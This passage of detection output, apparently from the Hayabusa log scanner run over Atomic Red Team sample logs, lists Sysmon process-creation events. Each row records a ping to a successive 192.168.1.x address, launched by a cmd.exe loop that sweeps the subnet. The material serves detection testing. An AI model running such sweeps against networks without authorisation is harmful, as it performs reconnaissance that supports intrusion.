192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:52:18.509 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping -n 1 -w 100 192.168.1.88 : Path: C:\Windows\System32\PING.EXE : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:52:18.990 
+09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping -n 1 -w 100 192.168.1.89 : Path: C:\Windows\System32\PING.EXE : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:52:19.541 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping -n 1 -w 100 192.168.1.90 : Path: C:\Windows\System32\PING.EXE : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:52:20.006 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping -n 1 -w 100 192.168.1.91 : Path: C:\Windows\System32\PING.EXE : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:52:20.543 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping -n 1 -w 100 192.168.1.92 : Path: C:\Windows\System32\PING.EXE : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:52:21.036 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping -n 1 -w 100 192.168.1.93 : Path: C:\Windows\System32\PING.EXE : User: MSEDGEWIN10\IEUser : Parent Command: 
""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:52:21.488 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping -n 1 -w 100 192.168.1.94 : Path: C:\Windows\System32\PING.EXE : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:52:22.030 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping -n 1 -w 100 192.168.1.95 : Path: C:\Windows\System32\PING.EXE : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:52:22.542 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping -n 1 -w 100 192.168.1.96 : Path: C:\Windows\System32\PING.EXE : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:52:23.037 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping -n 1 -w 100 192.168.1.97 : Path: C:\Windows\System32\PING.EXE : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 
192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:52:23.534 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping -n 1 -w 100 192.168.1.98 : Path: C:\Windows\System32\PING.EXE : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:52:24.026 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping -n 1 -w 100 192.168.1.99 : Path: C:\Windows\System32\PING.EXE : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:52:24.521 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping -n 1 -w 100 192.168.1.100 : Path: C:\Windows\System32\PING.EXE : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:52:25.035 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping -n 1 -w 100 192.168.1.101 : Path: C:\Windows\System32\PING.EXE : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:52:25.529 
+09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping -n 1 -w 100 192.168.1.102 : Path: C:\Windows\System32\PING.EXE : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:52:26.007 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping -n 1 -w 100 192.168.1.103 : Path: C:\Windows\System32\PING.EXE : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:52:26.534 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping -n 1 -w 100 192.168.1.104 : Path: C:\Windows\System32\PING.EXE : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:52:27.040 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping -n 1 -w 100 192.168.1.105 : Path: C:\Windows\System32\PING.EXE : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:52:27.493 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping -n 1 -w 100 192.168.1.106 : Path: C:\Windows\System32\PING.EXE : User: MSEDGEWIN10\IEUser : Parent Command: 
""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:52:28.017 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping -n 1 -w 100 192.168.1.107 : Path: C:\Windows\System32\PING.EXE : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:52:28.537 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping -n 1 -w 100 192.168.1.108 : Path: C:\Windows\System32\PING.EXE : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:52:29.110 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping -n 1 -w 100 192.168.1.109 : Path: C:\Windows\System32\PING.EXE : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:52:29.561 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping -n 1 -w 100 192.168.1.110 : Path: C:\Windows\System32\PING.EXE : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 
192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:52:30.054 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping -n 1 -w 100 192.168.1.111 : Path: C:\Windows\System32\PING.EXE : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:52:30.526 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping -n 1 -w 100 192.168.1.112 : Path: C:\Windows\System32\PING.EXE : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:52:31.015 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping -n 1 -w 100 192.168.1.113 : Path: C:\Windows\System32\PING.EXE : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:52:31.476 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping -n 1 -w 100 192.168.1.114 : Path: C:\Windows\System32\PING.EXE : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:52:32.005 
+09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping -n 1 -w 100 192.168.1.115 : Path: C:\Windows\System32\PING.EXE : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:52:32.515 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping -n 1 -w 100 192.168.1.116 : Path: C:\Windows\System32\PING.EXE : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:52:33.004 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping -n 1 -w 100 192.168.1.117 : Path: C:\Windows\System32\PING.EXE : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:52:33.515 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping -n 1 -w 100 192.168.1.118 : Path: C:\Windows\System32\PING.EXE : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:52:33.900 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping -n 1 -w 100 192.168.1.119 : Path: C:\Windows\System32\PING.EXE : User: MSEDGEWIN10\IEUser : Parent Command: 
""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:52:34.490 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping -n 1 -w 100 192.168.1.120 : Path: C:\Windows\System32\PING.EXE : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:52:35.031 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping -n 1 -w 100 192.168.1.121 : Path: C:\Windows\System32\PING.EXE : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:52:35.411 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping -n 1 -w 100 192.168.1.122 : Path: C:\Windows\System32\PING.EXE : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:52:35.999 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping -n 1 -w 100 192.168.1.123 : Path: C:\Windows\System32\PING.EXE : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 
192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:52:36.510 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping -n 1 -w 100 192.168.1.124 : Path: C:\Windows\System32\PING.EXE : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:52:36.905 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping -n 1 -w 100 192.168.1.125 : Path: C:\Windows\System32\PING.EXE : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:52:37.449 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping -n 1 -w 100 192.168.1.126 : Path: C:\Windows\System32\PING.EXE : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:52:37.947 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping -n 1 -w 100 192.168.1.127 : Path: C:\Windows\System32\PING.EXE : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:52:38.514 
+09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping -n 1 -w 100 192.168.1.128 : Path: C:\Windows\System32\PING.EXE : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:52:38.992 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping -n 1 -w 100 192.168.1.129 : Path: C:\Windows\System32\PING.EXE : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:52:39.508 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping -n 1 -w 100 192.168.1.130 : Path: C:\Windows\System32\PING.EXE : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:52:40.034 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping -n 1 -w 100 192.168.1.131 : Path: C:\Windows\System32\PING.EXE : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:52:40.520 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping -n 1 -w 100 192.168.1.132 : Path: C:\Windows\System32\PING.EXE : User: MSEDGEWIN10\IEUser : Parent Command: 
""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:52:40.960 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping -n 1 -w 100 192.168.1.133 : Path: C:\Windows\System32\PING.EXE : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:52:41.512 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping -n 1 -w 100 192.168.1.134 : Path: C:\Windows\System32\PING.EXE : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:52:41.967 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping -n 1 -w 100 192.168.1.135 : Path: C:\Windows\System32\PING.EXE : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:52:42.436 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping -n 1 -w 100 192.168.1.136 : Path: C:\Windows\System32\PING.EXE : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 
192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:52:42.881 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping -n 1 -w 100 192.168.1.137 : Path: C:\Windows\System32\PING.EXE : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:52:43.478 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping -n 1 -w 100 192.168.1.138 : Path: C:\Windows\System32\PING.EXE : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:52:43.951 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping -n 1 -w 100 192.168.1.139 : Path: C:\Windows\System32\PING.EXE : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:52:44.408 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping -n 1 -w 100 192.168.1.140 : Path: C:\Windows\System32\PING.EXE : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:52:44.926 
+09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping -n 1 -w 100 192.168.1.141 : Path: C:\Windows\System32\PING.EXE : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:52:45.532 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping -n 1 -w 100 192.168.1.142 : Path: C:\Windows\System32\PING.EXE : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:52:45.970 